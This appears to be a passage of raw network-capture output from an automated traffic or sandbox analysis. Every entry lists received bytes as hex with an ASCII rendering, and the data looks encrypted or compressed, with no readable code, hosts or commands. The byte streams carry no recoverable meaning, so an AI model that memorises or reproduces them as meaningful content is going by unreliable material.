                                                                                                                                                    2022-09-29 12:59:00 UTC2622INData Raw: 0e a7 3b 8c db 2c 21 e7 70 c4 c9 b4 17 64 2b ae e5 4b f6 34 1a af a1 9a f9 32 fe f9 8d b7 ab 44 06 61 80 8f 66 aa 59 5a 5d 6f 12 0d b1 d7 f0 68 27 e4 0d 4d fe 47 6f 3f f3 e6 32 30 a5 2a 39 79 b1 7b 2f 2a a0 04 9d a5 69 59 9d 3f ac 1e c5 48 db d0 b0 dd 95 a8 9b 47 16 e9 9a 9c 6d 88 d1 a2 91 a1 88 40 bf 93 ba 6b e5 51 6e 3f 6f 89 81 42 ac 4e 9f 37 95 3c 75 e4 89 4e eb 1d 6f c6 c6 1f fc 4d 42 58 8e b1 fd 2e be ab 73 5a 8d c4 9c 7c 68 49 0b 32 a0 1d 31 ff 81 9a 8a 1a 65 e2 20 ef 2e 3e c5 a6 e3 db 55 80 40 12 38 df 4d 7c 8b 72 a3 3d df 2c 0b 4d 63 e5 34 6f 11 2e bc 0d 2f 50 48 7e 3d 78 63 87 ee 52 27 a2 e0 34 87 b0 55 73 8b 8d d8 92 a0 2f 20 af d0 9f bc 67 c7 26 1a 3a be 4e 86 c8 ca 89 5a 63 99 06 83 04 e6 e1 11 d7 43 a2 52 6d c5 90 fe 52 42 48 59 56 0d d0 24
                                                                                                                                                    Data Ascii: ;,!pd+K42DafYZ]oh'MGo?20*9y{/*iY?HGm@kQn?oBN7<uNoMBX.sZ|hI21e .>U@8M|r=,Mc4o./PH~=xcR'4Us/ g&:NZcCRmRBHYV$
                                                                                                                                                    2022-09-29 12:59:00 UTC2638INData Raw: 9a e7 a3 65 9b 39 ac 6f 87 38 fe e9 81 69 5a 95 c5 37 90 f3 28 35 05 e8 ec ed 84 e5 3e 9b 79 a3 90 24 e9 be 72 99 2a b4 e9 d7 44 89 ab d7 0a ff af 58 82 2e 08 db 36 21 fe 55 94 31 ab db eb d4 f4 76 22 45 08 6e 5e ac ac 59 b0 63 5b 6b dd 2f 2e 99 c3 8b 5f 45 e8 31 8e 33 ed 5e f8 3a 2a 2f 96 ee 44 da 64 2b c7 72 11 83 11 f8 cd c8 53 c9 ad ad 62 68 b3 ab 57 02 a4 55 6d ca 52 2c c7 39 eb 28 4c b3 8d e1 cf 25 06 8b 2c 69 67 07 27 6a 6b 99 b3 cf 20 13 b3 a5 d9 86 f0 ba 3e b8 cc d6 49 99 60 ea 72 73 b6 05 e3 74 8c 17 30 a6 a8 a1 26 d1 7b 02 aa 65 13 02 f1 5a a7 75 d6 e0 d7 57 17 71 88 26 f8 e7 54 37 11 c1 e6 23 24 c3 78 a2 3c e3 08 3f 00 5c fe cd 99 be 81 00 88 1e 68 7b a7 39 ec da 2f 23 4a ed a4 cb a1 a0 4d 93 61 39 5d e1 42 fd 27 09 7f 89 b5 7e 85 59 7f 13 3e
                                                                                                                                                    Data Ascii: e9o8iZ7(5>y$r*DX.6!U1v"En^Yc[k/._E13^:*/Dd+rSbhWUmR,9(L%,ig'jk >I`rst0&{eZuWq&T7#$x<?\h{9/#JMa9]B'~Y>
                                                                                                                                                    2022-09-29 12:59:00 UTC2654INData Raw: b0 8f 23 02 cf 11 97 d3 1c a9 f2 3e 71 ac fe ba d0 89 69 11 4a e4 1f 7c 73 c6 6d a8 34 0f 7e c7 1e 39 32 ea 0c a0 b7 ed dc f6 cd f7 4d 3f 45 65 56 3d d2 83 8e a5 a5 ab 88 c4 a4 94 c5 e0 50 b2 a1 3b af 36 87 b4 db 83 cb a2 e4 d4 cd bf ba d6 d1 77 5f 09 29 af b8 63 84 15 41 31 40 e2 f6 9f 2c 25 6d 15 c4 d1 0d f0 bb 39 85 87 11 f2 c7 c0 03 0c df 94 34 fb 20 d1 e7 7e 15 06 c2 2e 06 aa fb 21 a8 49 83 63 98 a2 83 b7 dd 4d 00 44 d3 17 13 00 c6 40 68 10 99 62 9b c9 8c 8a eb 96 48 fa 2c db e4 64 b0 00 b5 c0 bc e3 68 7f 7f 0e 69 7d a1 a2 4e 19 14 fe fe 67 25 e7 31 c7 7c 30 eb b7 00 ea 26 b8 cf 89 ec 6e a2 57 e9 14 9d 69 3f a9 85 34 55 14 cb aa 48 49 04 56 a2 ff cd ce 0a 33 21 28 97 f6 dc 79 4c 6f b1 5a 63 e1 98 d1 7c 01 9b d8 9d c5 74 d7 6f b9 ce 18 f5 7c c0 7b 74
                                                                                                                                                    Data Ascii: #>qiJ|sm4~92M?EeV=P;6w_)cA1@,%m94 ~.!IcMD@hbH,dhi}Ng%1|0&nWi?4UHIV3!(yLoZc|to|{t
                                                                                                                                                    2022-09-29 12:59:00 UTC2670INData Raw: ab 4c d4 c2 36 a9 28 0e b7 c0 da 4f 9b d5 c5 13 65 a8 a3 95 06 2a e6 c9 63 9d f7 37 1d dc f6 30 c8 a1 c9 e6 e0 b6 e7 d6 50 e6 8a 90 01 dc e1 8e 45 4a fc e1 a8 58 50 55 b4 7b 6e e2 b8 e9 7f 2a 51 2c 69 98 94 25 7f 62 c4 c1 b4 4b b5 0c 01 80 18 43 1c 50 de 01 ed 27 27 96 25 3d cb 86 ea 87 98 78 dd b3 84 6e 53 97 dd 7a 9b 29 72 a5 44 93 82 cd cf 3f 0b 4a bc ac 00 88 c5 65 1c 15 93 5f 55 84 b7 56 34 76 7a ba 41 b3 54 ea dc b8 38 08 45 7a c6 da da 79 97 7f 9c 15 80 a5 43 1c 40 be c8 d7 8e 8a 3f 0c fd 85 c0 17 71 91 1e e5 d0 8e d5 3f 50 8e d9 a0 a5 8c b1 9c 59 2a 40 fe 2a c5 fe a1 83 ad c7 70 b8 86 83 9b 9b 3c 53 3d a0 70 7d cb cc 6a 0c 74 9a 06 ed fc e6 cb f1 60 f7 fd 24 19 50 1d 99 d4 30 87 b9 24 72 fb f9 97 e7 31 de 17 10 23 e8 3a f1 a7 cc 29 22 7d da c9 b6
                                                                                                                                                    Data Ascii: L6(Oe*c70PEJXPU{n*Q,i%bKCP''%=xnSz)rD?Je_UV4vzAT8EzyC@?q?PY*@*p<S=p}jt`$P0$r1#:)"}
                                                                                                                                                    2022-09-29 12:59:00 UTC2686INData Raw: dd 2e 9a ef 6b 4e 52 ec f7 f2 8d b7 d4 58 99 2e 04 0f cd 26 4e 67 b9 f0 05 80 33 f9 4b 6e 25 62 05 19 ae 2e c1 9c 64 ab 66 f1 88 98 c1 d8 bc 67 84 93 d6 c4 3d 26 1a 9a a3 9b b7 9a 62 5a e5 1e 63 67 3d fe 48 fa 4c 4a fd 0c 7f 75 b7 a3 39 e7 d4 29 67 ed df 03 4c ba 13 e7 47 9b 28 d9 01 69 d4 f8 79 81 fc 01 ed ce dc 7d 76 f9 88 84 34 56 e9 0f 54 b9 df cb d5 4a 43 70 c2 50 44 98 3e c2 7c 8d 30 0c 39 15 9e b1 a2 54 41 01 19 81 99 3b ad 29 31 c3 d2 27 ca db b8 66 02 8d ef 37 fc 02 91 9c 0e 50 5f 32 b6 24 30 12 08 f4 0a 07 37 08 86 0a fa b9 ef d8 e3 5a 4b db 31 b3 66 a3 50 3a cc b7 19 78 d2 97 33 a0 27 e7 79 3a b4 fb b3 ab 79 3a f7 ea 74 cc 92 f8 f0 e7 d8 03 4f 64 7e ae ac 19 74 b7 e0 e6 34 71 9e 2e ca 5b ff cc 15 44 fc 94 7f 2d ac e2 a8 2c 84 d3 32 f7 7d 4c 5f
                                                                                                                                                    Data Ascii: .kNRX.&Ng3Kn%b.dfg=&bZcg=HLJu9)gLG(iy}v4VTJCpPD>|09TA;)1'f7P_2$07ZK1fP:x3'y:y:tOd~t4q.[D-,2}L_
                                                                                                                                                    2022-09-29 12:59:00 UTC2702INData Raw: 2b a9 cb 58 2e 55 39 ab d0 4d 1a ee 53 d1 60 79 17 dc 1a a8 d1 a8 0b 7b d3 74 f8 b2 8d a0 ce bc 08 1e c3 67 92 c4 ce d0 7c 0b 9e 62 77 8b 94 e0 71 d2 38 90 88 38 a1 fd ec 08 09 f4 dd 54 7e f7 e6 ec d2 e2 b2 d9 1b d5 9e 9f 3f 46 6d 8a ba d6 5d 96 b1 d0 f6 af 6d 87 d6 ca e4 b1 07 86 1d 73 0e ee 60 b8 6b 03 18 86 77 b8 f7 bf 8b 2f 95 6a e5 c2 a0 00 73 8d 96 83 ca 4a 92 ef a5 fa ab df 3e d4 c0 b6 ba 49 2f d8 a4 96 1c 1a 09 9f 20 6f 67 83 a7 ef 2f ac 2b 06 47 14 3d 3d 41 3a 78 11 2f 82 5b e1 dc 11 f2 56 77 08 dc bc 40 39 f2 2d b3 bc 3a 71 35 04 1d 75 e3 3b 9f e5 cd 0f de b6 08 8b d6 63 d6 9e d4 69 e9 89 64 e3 98 6b f7 34 bd 61 55 47 31 c7 e9 47 ca a7 9a c0 97 d5 52 b0 25 4e 69 d5 1f 40 4a 89 ab 5b 7b 2d 2d 24 91 e7 9e ec 0f 6c 32 4a 92 c2 a7 34 9e 37 12 28 bc
                                                                                                                                                    Data Ascii: +X.U9MS`y{tg|bwq88T~?Fm]ms`kw/jsJ>I/ og/+G==A:x/[Vw@9-:q5u;cidk4aUG1GR%Ni@J[{--$l2J47(
                                                                                                                                                    2022-09-29 12:59:00 UTC2718INData Raw: f0 e2 5a 79 0b 65 a3 58 28 93 3b 4c 87 e7 9d 71 fb 04 db 6a 93 f7 79 5e 86 77 d2 d9 71 16 21 c0 17 f6 e7 c2 1b 29 6a d2 4f 58 5c f8 bc 91 78 fd a9 43 c9 14 b5 92 a0 b9 56 37 1c 0a a8 02 8c 37 ed bd 31 f5 98 67 1f a7 fb 14 61 a1 67 71 34 4d ac d1 68 38 00 1a d6 06 8e a2 9c 17 72 b4 c7 17 02 d5 b1 4b f5 c2 78 1e 46 d8 9e 00 f3 89 a9 fb 1b fd c9 ab b3 35 d1 54 31 66 84 30 d7 d5 c7 75 a1 e5 29 b3 45 d3 d5 19 7e 5f 85 3a 28 71 a9 9d b4 ea 56 81 2c 6d fe c3 d0 4b 20 d7 38 07 b4 44 31 92 33 2f 98 f1 09 d0 d0 f9 2c ad 45 0b 93 6f cf bd a7 e4 a4 b1 de 23 8c e1 a4 b3 75 53 e8 66 9b e0 91 60 f7 6a 8e 14 cb 57 73 1b c3 a7 97 15 7b 82 40 d5 e9 c4 51 f9 4e eb cd 98 5c d5 8e 89 d5 62 71 b0 76 9e a5 18 66 34 6a 06 77 b5 2e eb eb 8d 58 e2 9c 4d fd 87 b9 00 66 dd f7 48 d9
                                                                                                                                                    Data Ascii: ZyeX(;Lqjy^wq!)jOX\xCV771gagq4Mh8rKxF5T1f0u)E~_:(qV,mK 8D13/,Eo#uSf`jWs{@QN\bqvf4jw.XMfH
                                                                                                                                                    2022-09-29 12:59:00 UTC2734INData Raw: d9 c6 fc ba 3d be b3 5a d0 7f 61 6e 34 83 54 42 c5 bb 22 67 a7 fe 58 45 e6 df f2 e8 32 7c 2d 30 a8 e8 fb fb 11 e0 35 3e d9 5a fa e4 db 6f 71 df 53 71 67 7e 30 49 67 30 96 a0 aa a2 b6 c9 16 a4 36 10 16 cd ad 20 b6 ff 11 0e 24 4e 02 2a a0 b8 8b 94 a3 c7 72 03 59 ce 47 64 27 b1 c8 8f 00 73 ab b8 2c 52 81 11 15 97 53 c6 de 63 1b c4 e8 d2 01 da ab 42 db a1 da 5e 2b 01 57 a4 36 80 6d 73 70 18 43 2d 5a a4 2f b7 79 13 45 c9 97 01 a3 4e cb 90 fb c1 6d b9 f8 74 72 87 3f d8 b1 3f f5 91 bc 32 ed 99 d1 52 92 1a 41 27 6a 19 1c cb b1 2f 41 79 2b 40 bd 53 c0 d0 f6 3a ea e8 d6 71 6b 8e 82 54 9c 0f e5 64 10 20 02 5c d7 21 99 38 80 47 22 f8 65 e1 8b 37 49 c0 b4 0a 0b 16 d0 ee 29 89 86 35 11 70 33 00 88 fa 0b 34 de 23 0b 1c ea f1 62 d1 76 93 40 93 04 f0 73 1b 5c ac c5 34 09
                                                                                                                                                    Data Ascii: =Zan4TB"gXE2|-05>ZoqSqg~0Ig06 $N*rYGd's,RScB^+W6mspC-Z/yENmtr??2RA'j/Ay+@S:qkTd \!8G"e7I)5p34#bv@s\4
                                                                                                                                                    2022-09-29 12:59:00 UTC2750INData Raw: e3 00 92 34 30 4e d7 41 33 37 5b ae 95 4b a1 89 8c eb cb 51 d5 7f d4 9f 0f 40 6e 75 ab 40 80 52 5b 07 76 3b 84 e1 ff 9a 65 52 e9 d5 d8 c5 5f e2 f6 cd db 96 66 36 6b 58 19 a6 e9 3c ba 79 de a9 8a 83 af 01 b8 60 84 62 16 cc 08 9a b2 a2 1a 07 b1 44 a3 32 9b 80 71 b8 f3 ef 20 35 c8 74 b8 84 3c 4f fe b1 5d a2 d4 3e 09 15 2a 7b f0 29 52 a0 08 1d b2 16 9e 58 81 ce 59 88 c9 9f 27 98 70 09 21 2a 59 0d fb 23 c4 da e7 35 d8 3e 05 c1 1e 23 94 15 69 59 61 0d 58 b4 d5 a5 aa fe 54 7f a6 56 4e bb fb ea b3 c4 e3 d3 01 00 08 ae 6a 4b c9 9f f3 48 47 04 7e ae 4d f5 86 49 b7 07 97 f3 e2 e4 7a 66 39 b7 26 de d5 63 9b 0a a8 e9 28 81 e5 34 21 68 24 27 90 d6 59 c4 34 fd 08 3f ab 0f c5 39 4c c8 a2 8a b1 94 ec a1 12 a8 c1 01 80 75 44 99 83 93 ae 5f dd 34 37 a5 d7 3f fc c6 17 df 65
                                                                                                                                                    Data Ascii: 40NA37[KQ@nu@R[v;eR_f6kX<y`bD2q 5t<O]>*{)RXY'p!*Y#5>#iYaXTVNjKHG~MIzf9&c(4!h$'Y4?9LuD_47?e
                                                                                                                                                    2022-09-29 12:59:00 UTC2766INData Raw: 0b 89 94 99 fa 28 2b fc f7 83 4d 20 eb 42 bb 1d f7 28 95 d9 04 39 9f 35 0c f1 2a 2c 98 ab d1 bb 63 c4 2e d2 63 8b ae f5 1a 3e 70 ed c3 e0 01 40 e0 10 38 29 39 0d 38 98 c9 0b 9f 8b 3b 72 0d ee 67 85 fd 3d 9f df 8b 43 2d da 51 81 32 f4 fd ae 15 66 af 1a 8e 7b ce 3f 3e 66 4b 94 84 81 15 d2 4f b8 15 d7 7b 77 66 fa 2b 0c 49 43 2e da a4 23 da 98 5e cb fb 39 0e 3e bd d7 f3 3a 67 0e 22 d8 84 7d 9a a1 7f f3 17 be ae 57 40 e2 cb 44 d0 60 ec 70 b8 e6 c6 b4 83 37 fd a7 3b 16 e6 19 d8 bd 24 5d d2 8b e2 a5 05 e1 1f 85 e1 ac bd ba ef 46 76 89 1f 16 5f c7 8c e0 b1 9f d5 37 13 3d 1a 7b 77 89 48 4d d4 6c 1f 4b de aa c2 2e 27 2b a4 91 3f af b1 a1 0b d0 e6 be 27 e2 42 4f 2c 91 3e 5d 9d 29 6d db 8b 17 c8 b7 a0 08 30 61 23 78 de 19 f9 48 4c 40 c9 a6 81 1c 7d e5 ab d1 38 ef 1f
                                                                                                                                                    Data Ascii: (+M B(95*,c.c>p@8)98;rg=C-Q2f{?>fKO{wf+IC.#^9>:g"}W@D`p7;$]Fv_7={wHMlK.'+?'BO,>])m0a#xHL@}8
                                                                                                                                                    2022-09-29 12:59:00 UTC2782INData Raw: 89 1c 4c b3 47 f7 f2 4b a4 52 05 f2 72 f1 07 a0 1e c1 54 22 01 2d d9 ad 39 ca e0 f8 b7 46 8c 27 d9 67 6a 44 1d 42 ae 48 42 59 f8 2c 37 cf 4e e6 62 52 d1 ca cb 1e 01 3c e9 2a e3 d9 a2 16 f0 0e c9 7a c9 ef 5e 31 b1 ff 87 5b 79 5a c2 d2 ae 9f 16 ec be 77 f2 5e 9e 8b e1 14 4b dc 84 2f 93 79 e5 e8 c9 c2 16 a8 aa 20 7d d7 51 97 4f 60 49 0f d5 b0 4d d8 53 e7 bd f6 49 15 eb ea 68 f1 97 0a 09 40 4f 6e aa 71 7b 49 32 9b 37 50 8f 19 be d8 49 69 e3 13 58 7e fa 23 40 f5 09 cf 55 9a c0 c8 07 b6 7d f6 e2 36 a9 ef 69 e2 26 5c 91 1e fa 61 6b e9 13 db 21 ea 12 b9 f8 ea 3e 11 81 eb 30 d6 d2 39 48 70 a3 f7 ef 96 76 4b 0f c1 9f 74 79 07 2f bc 0b cf 67 b1 66 e5 0e 4b 50 26 bb 7d 62 3e 06 56 d3 f3 d1 8b 50 59 ce 42 1f d1 ae c5 2e e9 12 c2 6c 5d 3a 88 18 22 c3 75 f8 b1 d1 93 a7
                                                                                                                                                    Data Ascii: LGKRrT"-9F'gjDBHBY,7NbR<*z^1[yZw^K/y }QO`IMSIh@Onq{I27PIiX~#@U}6i&\ak!>09HpvKty/gfKP&}b>VPYB.l]:"u
                                                                                                                                                    2022-09-29 12:59:00 UTC2798INData Raw: f0 02 60 89 e4 1d 1a 45 1b df db 50 9a 67 bf 45 33 16 d3 4b df 9e 9a a7 59 ea 4e 3a 1a 4d 26 d3 41 d6 00 a2 21 33 a3 fd d2 17 5a 26 db 2f f1 9e 45 a3 66 b4 3e be 70 b4 29 61 22 ec 86 f1 d2 c4 80 03 60 76 43 a5 08 20 5d 6e 46 b8 3c 8f e9 29 34 25 26 80 bd 96 4c d3 f1 af d5 87 43 41 1d 8f ed 3c c9 c0 f4 59 d1 7e 38 19 21 15 6d e4 d5 a7 c5 97 f0 8d 12 aa c6 0a 3f f2 1f e0 53 f0 63 3a a2 d4 39 21 87 4a b2 a5 d6 bf 7f 27 3e 0e eb 19 58 f0 d4 5f 41 ca 53 c9 75 fc ba c3 e4 75 78 73 a2 05 1b 9c 76 9f 58 de 15 98 47 eb b3 c8 94 29 43 e5 fb b9 b7 2e 7f bb 15 e4 45 f6 3e b7 97 f7 bb c7 bf 1b f6 68 b1 ea d9 18 c9 3d ba 81 a5 4b c7 0d 80 38 5e 33 71 9d 1a 32 d7 9c dc 62 68 ea a6 bd 4c 1b 54 c7 32 84 9b 8b 7d ad ba 0b 6b 78 38 ba 5a 5f 58 3d 6c 31 14 36 be e9 24 d5 93
                                                                                                                                                    Data Ascii: `EPgE3KYN:M&A!3Z&/Ef>p)a"`vC ]nF<)4%&LCA<Y~8!m?Sc:9!J'>X_ASuuxsvXG)C.E>h=K8^3q2bhLT2}kx8Z_X=l16$
                                                                                                                                                    2022-09-29 12:59:00 UTC2807INData Raw: 7d c2 d3 16 ae b5 26 1d 2c b8 9f 64 23 03 c7 f4 62 89 b0 ed 77 4e f4 61 a5 7d 94 13 bf fb 73 97 db 2a e9 b3 91 71 26 80 71 b2 9a 87 a9 60 b7 c4 e6 26 c3 b5 fc fa 47 ea 93 a1 0c 33 c2 34 0a 61 80 13 ff d5 65 79 df 41 fd fe 36 63 2b d1 c0 97 e7 a7 e6 36 a2 58 b4 a2 34 19 17 f0 29 35 94 84 af ac 85 b7 7d 21 39 51 cb 40 e1 d5 2b 6f 35 82 2e be 6b 4d 49 2d 3a bd 44 fd 3a cb cf 7f 2a e1 91 18 65 42 65 eb 34 11 4b 2f 29 39 bf b7 b7 a1 ed ae 07 2f d3 65 2a 0f 49 a7 38 ec d1 2f 9c 7c 12 7e 9e f6 66 11 67 9e d7 47 7b 64 e1 ab a4 44 57 07 5b cd 85 5d d2 5a 48 89 ea a7 e2 5c b3 28 89 e5 69 79 3a 20 bc dd fe e5 0d d4 8e ed c5 e9 92 4e 7a c3 24 12 88 d5 c6 eb fb 9e eb 16 47 8c df 99 11 f3 49 26 76 7c 91 06 86 53 49 16 3e 17 15 2d 5f 07 1d 5e 10 5d f9 22 b4 2e 7a fc f4
                                                                                                                                                    Data Ascii: }&,d#bwNa}s*q&q`&G34aeyA6c+6X4)5}!9Q@+o5.kMI-:D:*eBe4K/)9/e*I8/|~fgG{dDW[]ZH\(iy: Nz$GI&v|SI>-_^]".z
                                                                                                                                                    2022-09-29 12:59:00 UTC2823INData Raw: c5 ef 2c 94 5d 9f 41 e8 69 ca 48 fd ad 12 c6 f1 40 de 50 70 10 55 4f 71 7f b8 c7 a4 4c 52 b2 39 67 2e 77 75 03 5f 9b 02 19 6b a9 e0 a5 60 ee 4b de 29 6d b1 a2 aa 2e 80 63 8b 22 43 6c 55 3e 2f 6d f9 df d7 d6 5e 0c 69 04 7f 08 64 ca 82 60 a1 0c 6d 00 6a a9 cb d3 4f 50 8b 05 64 d3 18 c8 d4 6c 13 ec fc 4f 46 ab 73 40 db d7 b0 d7 25 30 a3 58 ed a5 86 79 3c a7 71 95 42 db 90 20 59 e5 83 2f c8 de 20 c6 e5 3e b2 84 22 8c 8f 60 a5 c6 87 d6 a2 bb 66 f5 7f d5 12 a1 26 28 60 df 2a 80 57 20 8a 27 9e 3c 0e 67 57 75 50 70 b9 ef 41 5e 47 51 fb d2 66 32 89 29 a2 f8 4a de 46 ab 07 26 c2 2b b3 f1 38 15 99 46 0e d1 8d 25 a3 22 cf 01 01 da ec 26 39 9d 84 29 81 89 03 72 e6 69 bc 8f 62 e0 0e e2 b5 7a 54 18 bc c9 2a c7 67 8d 3d 45 33 58 b4 1c 54 ab 10 f7 ba 6a f6 f7 1f 45 bc 0b
                                                                                                                                                    Data Ascii: ,]AiH@PpUOqLR9g.wu_k`K)m.c"ClU>/m^id`mjOPdlOFs@%0Xy<qB Y/ >"`f&(`*W '<gWuPpA^GQf2)JF&+8F%"&9)ribzT*g=E3XTjE
                                                                                                                                                    2022-09-29 12:59:00 UTC2839INData Raw: 0d e5 74 77 1c db 95 ea 4a 0f ea b1 4f 98 94 94 f3 2c 38 ac a2 a2 1e 70 e2 a4 4f a8 8d 4e cd c7 00 20 f4 e8 d4 a3 7e e0 59 c5 2c bb 49 09 3d 3e 23 23 bc 28 ca 46 18 8b 7f 3c 46 2a 4f 22 52 b6 51 72 cf 23 37 4b 82 d4 c4 36 a7 01 48 48 e5 f0 d2 49 f3 2f 2a 9d 66 f6 3e c2 0f f4 83 2c 91 ce c6 06 47 04 e1 c5 a6 58 37 9d 41 79 ed 36 2f 29 14 87 55 62 57 4d 7c 72 f3 be 15 0b e8 c0 2b 64 5a dd 6a 98 82 3c 6e 77 29 07 32 9c 2b ac 43 ba ac aa b7 65 da ad 7c 7e cd 33 69 7c 4a 3e 81 dc 3e 52 19 e9 1b 61 10 bf 3e 70 62 d5 7f f3 ce 13 49 60 5f 94 12 e3 1a 7e 9b b7 99 93 c8 7e cf bb 25 f5 b8 e0 b6 32 ed 2e 83 e1 70 78 c7 80 b3 a6 67 3b b5 1d 2f 7b 3d 17 ef 89 4f fc 32 80 f0 57 c4 9c a8 bc f5 f7 14 44 39 e5 4c 4d f3 f9 e8 e5 46 36 16 2c 03 f7 b9 58 bf 36 5c 5d 63 e8 1f
                                                                                                                                                    Data Ascii: twJO,8pON ~Y,I=>##(F<F*O"RQr#7K6HHI/*f>,GX7Ay6/)UbWM|r+dZj<nw)2+Ce|~3i|J>>Ra>pbI`_~~%2.pxg;/{=O2WD9LMF6,X6\]c
                                                                                                                                                    2022-09-29 12:59:00 UTC2855INData Raw: aa 15 a9 cd 08 82 d7 80 da 24 69 f0 01 b6 71 a3 6b 15 ca de 9d 7e 73 2e 91 bf 72 9f d4 54 b0 1e 91 e5 bf 6b 0c 70 36 73 24 d4 36 7a 30 cb e3 2f 0d 52 0b e9 af 10 21 62 19 a6 03 19 09 25 a1 b7 98 a0 12 c6 d4 40 36 3a 1c a6 68 0d 78 c6 6f aa 69 fb e0 26 ff 36 7b ac b8 7b 44 c6 00 a0 de da d7 28 4f 58 4e 69 cf 9d 03 56 a3 34 c6 41 50 c4 6e 56 69 5f 03 aa a8 61 15 8c 42 67 0e 41 47 73 08 96 ea 7d 82 b8 a9 73 f7 19 19 75 42 65 da 84 be 82 81 b3 f9 b2 a7 b6 4f f8 f4 1c f7 3f ec 26 bc c3 19 1b 32 36 3e f6 f8 62 8e f7 0b 32 62 85 f9 ad b3 2f 9e 2d f8 0b 74 58 04 23 59 fc fb 4d 80 20 08 96 91 f0 4b c9 0b ef 6b f1 37 57 e1 d2 a1 99 3a 4e 18 1c 81 e6 27 cb 46 9c c8 95 6d 52 26 66 77 43 be 85 d1 ca 3f fd e5 40 8f 36 50 d7 dd 15 72 78 fa b7 1a 47 25 7d f5 26 4f 60 88
                                                                                                                                                    Data Ascii: $iqk~s.rTkp6s$6z0/R!b%@6:hxoi&6{{D(OXNiV4APnVi_aBgAGs}suBeO?&26>b2b/-tX#YM Kk7W:N'FmR&fwC?@6PrxG%}&O`
                                                                                                                                                    2022-09-29 12:59:00 UTC2871INData Raw: ed c9 ab 17 f8 fc 5d 1a e7 1a 09 d2 71 0b f9 bb d2 9c 9c 5d c5 0d ea 2c f1 31 b3 61 d3 c8 9f 3c 5c d9 38 b4 70 a7 11 9d cd 28 01 4d 59 85 02 72 be 30 6d 67 c9 3e da 44 f4 7a a6 1e ee 94 76 1f 8b 5e 6f f3 c4 bb 72 e8 fb b5 11 70 4b f4 e1 40 21 1b 7c d8 fe e7 0f 5c 3e f1 ca e9 3c 44 e8 f7 ce e6 b3 0d db ac f1 af 1d bc b7 88 de f2 3c 5a a5 f8 39 2d 33 8f c9 14 89 07 75 bd 0e 25 4c fe 6c 7a 3e 56 6a c4 e8 91 4a 9e 90 25 f2 88 4b 5b d6 22 60 10 91 59 db 64 fe ee 92 91 32 a9 d5 1c 61 51 6d 98 0d 74 c3 67 50 ad ce 31 45 f5 1b 33 be 37 87 8b d4 c8 02 50 13 ae cd 94 e6 ff 2c 0d a2 38 c0 84 00 f8 2b e5 2e 3c 0f ad d3 f5 e0 2a 7c a2 1a 95 c5 3a 59 f8 96 83 86 d6 90 6c df 94 35 9c e2 08 c5 dc 43 30 da 0b 8c ed a3 fd 57 20 53 5d b9 d4 7a 84 7b 4c 73 e5 c1 69 9d b9 4a
                                                                                                                                                    Data Ascii: ]q],1a<\8p(MYr0mg>Dzv^orpK@!|\><D<Z9-3u%Llz>VjJ%K["`Yd2aQmtgP1E37P,8+.<*|:Yl5C0W S]z{LsiJ
                                                                                                                                                    2022-09-29 12:59:00 UTC2887INData Raw: 81 9d 2e 25 ec 58 30 8c e8 f1 2e ed 2c e4 c8 75 f3 84 a1 b9 4d 1e 79 33 90 7b d9 41 50 db d1 5c ca d1 2c d0 54 ef 69 6f e7 e1 dc 67 ef 76 df e0 79 c7 e8 63 8a 57 6e a3 87 68 09 af 15 69 20 22 44 e2 6e 3b 65 72 b0 81 cd 42 be cc 1b 1b 05 99 f3 f6 c8 0e 56 16 bb b4 01 ad c7 ab 82 ee e2 a0 0c 3b f8 69 a0 e8 c3 50 f8 86 58 d8 c9 0e 19 30 81 6a 6e 82 d9 f7 76 1b dc ab 06 45 7c b4 f5 cd 69 22 e9 02 99 62 0a 68 5e 9f 79 bc 88 cb fe b2 13 7e 1e 6c 92 ee 1c c7 1d 31 d6 f3 78 47 b7 00 8c 09 66 55 90 7c 52 5b 90 be 06 ed e6 64 b1 e0 66 cb 54 79 50 fa 8b cc 9a 83 51 68 5f 7d ba e0 17 6d 2e 3c 1b a7 92 74 43 0a ca ff 7e 5a bf 7f 8c 30 e1 46 dc 27 b4 b9 4a 93 fb 70 a0 eb 0d 6e 9d 63 6a 77 ce e6 e8 07 00 48 68 6b 90 84 02 89 7b a4 58 b1 63 83 94 4f 4d e6 0a c7 77 d8 2b
                                                                                                                                                    Data Ascii: .%X0.,uMy3{AP\,TiogvycWnhi "Dn;erBV;iPX0jnvE|i"bh^y~l1xGfU|R[dfTyPQh_}m.<tC~Z0F'JpncjwHhk{XcOMw+
                                                                                                                                                    2022-09-29 12:59:00 UTC2903INData Raw: 8b bf f9 68 fc e6 58 92 8f 05 76 a2 67 08 1a a0 77 5d 9d bd f4 53 37 21 50 25 fc 85 63 3c d4 77 ec d7 cd b9 03 24 ed 81 70 e3 eb 81 ae 68 b6 13 74 56 f5 c7 7c 89 9d 91 49 0c 53 2f d5 e1 a0 47 18 64 b4 7d 8e 6e 20 c2 7f a2 d1 4f 98 24 e0 26 30 ae b0 04 35 b9 3e dd c6 7a 07 44 77 95 7e 6c f4 7e 4d 2d 03 38 90 ad c6 33 5b 2f 6e 76 10 a5 8e 6e 3b 79 b3 0c 8d 9a 9d 88 40 f9 d1 34 92 40 e7 0d 34 e9 b8 bf 8c d1 b8 e2 23 fa 74 a7 4e 1d c0 c4 89 e4 2f 6d 91 96 09 49 b2 c0 f6 71 85 1a 2c b8 40 88 0a 64 eb a2 d9 1d eb 90 2f c2 57 77 b5 f3 f6 2b 6b c0 f8 95 69 b0 ef b1 ab fb c4 93 f4 14 5d 15 5f ab d9 48 a0 5e 5c 92 a5 c8 b1 78 3d 4b 49 1d 44 31 bc 34 92 3b 1d fb 30 ad de 7f a1 f2 72 78 2d 48 28 65 71 34 77 53 30 1d e3 da 59 82 ae ee 67 d8 58 d8 70 5b ba ca 30 5b 56
                                                                                                                                                    Data Ascii: hXvgw]S7!P%c<w$phtV|IS/Gd}n O$&05>zDw~l~M-83[/nvn;y@4@4#tN/mIq,@d/Ww+ki]_H^\x=KID14;0rx-H(eq4wS0YgXp[0[V
